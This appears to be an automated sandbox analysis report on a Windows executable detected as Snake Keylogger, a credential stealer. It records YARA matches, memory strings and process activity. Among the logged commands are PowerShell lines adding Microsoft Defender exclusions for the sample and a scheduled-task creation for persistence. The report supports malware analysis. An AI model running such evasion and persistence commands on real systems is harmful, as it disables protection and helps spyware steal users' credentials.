                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F3E099_2_013F3E09
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FF8049_2_013FF804
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FEC0B9_2_013FEC0B
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FFC489_2_013FFC48
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B652909_2_06B65290
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B69E809_2_06B69E80
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B622889_2_06B62288
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B61BA89_2_06B61BA8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B60B309_2_06B60B30
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B695909_2_06B69590
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B629709_2_06B62970
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B652809_2_06B65280
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6F6209_2_06B6F620
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6F6109_2_06B6F610
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B68E089_2_06B68E08
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6FA789_2_06B6FA78
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B622789_2_06B62278
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6FA699_2_06B6FA69
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B697B09_2_06B697B0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6D7B89_2_06B6D7B8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B61B979_2_06B61B97
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B60B209_2_06B60B20
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6CF089_2_06B6CF08
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6D3609_2_06B6D360
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6D3519_2_06B6D351
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E4B19_2_06B6E4B1
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E4C09_2_06B6E4C0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6DC109_2_06B6DC10
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B600069_2_06B60006
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6DC019_2_06B6DC01
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E0679_2_06B6E067
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E0689_2_06B6E068
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B600409_2_06B60040
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6F1B99_2_06B6F1B9
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6F1C89_2_06B6F1C8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E9189_2_06B6E918
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6E9089_2_06B6E908
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6ED709_2_06B6ED70
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B6ED609_2_06B6ED60
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_00B4D5BC10_2_00B4D5BC
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_0901190810_2_09011908
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_09011D3010_2_09011D30
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_09011D4010_2_09011D40
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_09013C4710_2_09013C47
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_09013C5810_2_09013C58
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_0901216810_2_09012168
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_0901217810_2_09012178
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_090125B010_2_090125B0
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_090154A910_2_090154A9
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 14_2_00F829D014_2_00F829D0
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 14_2_00F83E0914_2_00F83E09
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000000.2005320237.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2066859102.000000000A250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.00000000048CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.0000000003338000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2059553985.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2064715859.0000000007381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4468952080.0000000000F37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exeBinary or memory string: OriginalFilenameUJLf.exeF vs WIpGif4IRrFfamQ.exe
                Source: WIpGif4IRrFfamQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: WIpGif4IRrFfamQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: AcEnrS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, XM8BCNlbKp5JEuAqSx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, XM8BCNlbKp5JEuAqSx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, XM8BCNlbKp5JEuAqSx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/19@4/4
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile created: C:\Users\user\AppData\Roaming\AcEnrS.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeMutant created: \Sessions\1\BaseNamedObjects\dNwYxCASxh
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7708
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile created: C:\Users\user\AppData\Local\Temp\tmp5423.tmpJump to behavior
                Source: WIpGif4IRrFfamQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: WIpGif4IRrFfamQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.00000000030C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: WIpGif4IRrFfamQ.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile read: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\AcEnrS.exe C:\Users\user\AppData\Roaming\AcEnrS.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"
